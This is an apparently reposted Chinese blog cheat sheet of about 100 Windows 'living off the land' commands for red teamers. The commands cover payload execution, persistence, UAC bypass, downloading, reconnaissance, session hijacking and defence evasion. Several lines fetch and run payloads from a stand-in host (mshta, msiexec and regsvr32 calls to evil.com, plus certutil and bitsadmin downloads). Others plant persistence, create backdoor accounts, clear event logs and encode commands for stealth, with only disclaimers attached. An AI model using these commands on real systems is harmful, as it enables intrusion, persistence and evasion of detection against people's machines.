文章总结： 这是一份2025年WindowsLotL速查表，汇总了100条利用系统原生工具进行攻击、持久化及规避检测的命令。面向红队与渗透测试人员，涵盖执行、下载、侦察及系统操作。强调利用内置二进制文件规避杀软的优势，建议通过编码组合与沙箱测试提升隐蔽性。 综合评分： 92 文章分类： 红队,渗透测试,免杀,内网渗透,安全工具

2025 年 Windows Living Off the Land (LotL) 终极速查表

Mr. The Plague

securitainment

2025年12月29日 13:37 中国香港

简介

在 Windows 中，Living off the land (LotL) 指借助系统内置工具来执行攻击、建立持久化并规避检测。本速查表为红队人员与渗透测试人员汇总了 100 条 Windows 原生命令。

为什么 LotL 重要

LotL 不依赖外部二进制文件，因此更容易规避杀毒软件，并融入正常的系统活动。

LotL 技术

执行

| 命令 | 用途 | | — | — | | powershell -c <command> | 执行 PowerShell 命令 | | cmd /c <command> | 运行基础 Shell 命令 | | mshta http://evil.com/mal.hta | 执行 HTA 文件 | | rundll32.exe evil.dll,EntryPoint | 加载恶意 DLL | | msiexec /q /i http://evil.com/payload.msi | 静默安装 payload | | wmic process call create "cmd.exe /c evil.exe" | 通过 WMI 创建进程 | | forfiles /p c:\ /c "cmd /c evil.exe" | 循环执行 | | pcalua -a evil.exe | 借助程序兼容性提权 | | regsvr32 /s /u /i:http://evil.com/script.sct scrobj.dll | 借助 DLL 执行脚本 | | cmstp /ni /s evil.inf | 执行 INF 文件 | | wscript script.vbs | 运行 VBScript 脚本 | | cscript script.vbs | 静默运行脚本 | | start cmd /c evil.exe | 在新窗口启动 | | runas /user:hacker cmd.exe | 使用备用凭据 | | wusa evil.msu /quiet | 静默安装包含 payload 的更新 |

持久化

| 命令 | 用途 | | — | — | | schtasks /create /tn "Task" /tr "cmd.exe" /sc daily | 创建每日计划任务 | | reg add HKCU\Software\Run /v Evil /t REG_SZ /d "cmd.exe" | 添加到启动项 | | sc create EvilService binpath= "cmd.exe /c evil.exe" | 创建持久化服务 | | at 12:00 cmd.exe /c evil.exe | 传统任务计划 (at) | | mofcomp evil.mof | 通过 WMI 持久化 | | assoc .txt=evil.exe | 劫持文件关联 | | ftype txtfile=evil.exe "%1" | 将文件类型指向 payload | | bcdedit /set {default} safeboot network | 修改启动配置 |

提权 / UAC 绕过

| 命令 | 用途 | | — | — | | eventvwr | 通过注册表绕过 UAC | | fodhelper | 静默提升权限 | | sdclt /kickoffelev | 触发提升权限的进程 |

文件下载 / 传输

| 命令 | 用途 | | — | — | | bitsadmin /transfer job /download /priority normal http://evil.com/file.exe C:\file.exe | 下载文件 | | certutil -urlfetch -f http://evil.com/file.exe file.exe | 下载文件 | | IWR -Uri http://evil.com/file -OutFile file.exe | PowerShell 下载 | | certutil -decode encoded.txt decoded.exe | 解码 base64 文件 |

侦察

| 命令 | 用途 | | — | — | | wmic process list | 列出进程 | | net user /add hacker password | 创建用户 | | netstat -ano | 显示网络连接 | | ipconfig /all | 显示网络配置 | | whoami /all | 查看用户权限 | | systeminfo | 获取系统信息 | | tasklist /v | 列出进程及详细信息 | | dir /s /b c:\ > files.txt | 枚举文件 | | findstr /si password *.txt | 搜索凭据 | | type secret.txt | 读取文件内容 | | arp -a | 本地网络信息 | | route print | 查看路由表 | | nbtstat -A 192.168.1.1 | NetBIOS 侦察 | | driverquery | 列出驱动 | | fsutil fsinfo drives | 列出磁盘 | | gpresult /r | 显示组策略 | | netdom query dc | 域控制器信息 | | nltest /dsgetdc:domain | 域信任详情 | | dsquery * -limit 0 | 查询 AD 对象 | | query user | 列出用户会话 |

网络操作

| 命令 | 用途 | | — | — | | netsh interface portproxy add v4tov4 listenport=80 connectport=8080 connectaddress=127.0.0.1 | 端口转发 | | ping -n 10 192.168.1.1 | 测试连通性 | | tracert 8.8.8.8 | 跟踪网络路径 | | pathping 8.8.8.8 | 分析延迟 | | mstsc /v:192.168.1.1 | 远程桌面 |

文件系统操作

| 命令 | 用途 | | — | — | | copy evil.exe c:\windows\temp | 复制文件 | | move evil.exe c:\windows\system32 | 移动文件 | | del evidence.txt | 删除文件 | | echo PAYLOAD > evil.bat | 创建文件 | | attrib +h evil.exe | 隐藏文件 | | icacls file.exe /grant hacker:f | 修改权限 | | takeown /f file.exe | 取得所有权 | | net share evil=c:\evil /grant:hacker,full | 共享文件 | | mkdir c:\hidden | 创建目录 | | rmdir /s /q c:\evidence | 删除目录 | | ren evil.exe legit.exe | 重命名文件 | | xcopy evil.exe c:\windows /h /c | 保留属性复制 | | robocopy c:\source c:\dest evil.exe /mir | 镜像目录 | | replace evil.exe c:\windows /u | 替换文件 | | expand evil.cab -F:* c:\dest | 解压 CAB 文件 | | makecab evil.exe evil.cab | 打包为 CAB | | extrac32 evil.cab | 提取文件 |

规避 / 防御规避

| 命令 | 用途 | | — | — | | powershell -enc <base64> | 对 payload 进行编码 | | wevtutil cl System | 清空日志 | | eventcreate /t ERROR /id 100 /l APPLICATION /d "Fake" | 生成伪造日志 | | powercfg /hibernate off | 禁用休眠 | | subst z: c:\evil | 映射驱动器以混淆 |

系统控制

| 命令 | 用途 | | — | — | | taskkill /im process.exe /f | 结束进程 | | shutdown /r /t 0 | 重启系统 | | diskpart | 管理磁盘 | | chkdsk c: /f | 检查磁盘 | | sfc /scannow | 扫描系统文件 | | syskey | 启用 SAM 加密 | | vssadmin create shadow /for=c: | 创建卷影副本 |

数据处理

| 命令 | 用途 | | — | — | | comp file1 file2 | 比较文件 | | fc file1 file2 | 比较文件差异 | | sort < input.txt > output.txt | 排序数据 | | cipher /e file.txt | 加密文件 |

会话管理

| 命令 | 用途 | | — | — | | qwinsta | 列出会话 | | rwinsta 1 | 重置会话 | | tscon 1 /dest:console | 劫持会话 | | tskill processname | 结束任务 | | logoff 1 | 结束会话 |

杂项

| 命令 | 用途 | | — | — | | auditpol /set /category:"Logon" /success:enable | 设置审计策略 | | secedit /export /cfg config.txt | 导出安全配置 | | psr /start /output record.zip /sc 1 | 屏幕录制 | | explorer c:\evil | 打开资源管理器 | | control | 启动控制面板 | | msg * "Warning" | 发送消息 | | set PATH=%PATH%;C:\evil | 修改 PATH |

实战技巧

• 为提高隐蔽性，可将 powershell -enc与 cmd /c组合使用。
• 使用 whoami /all确认当前权限。
• 先在沙箱中测试——部分命令可能影响线上系统。

结语

这份 LotL 速查表汇总了 100 种 Windows 原生技术。熟练掌握它们，有助于降低被检测的概率。

Master LotL in 2025: Living Off the Land in Windows: The Ultimate Cheat Sheet

免责声明：本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：securitainment Mr. The Plague《2025 年 Windows Living Off the Land (LotL) 终极速查表》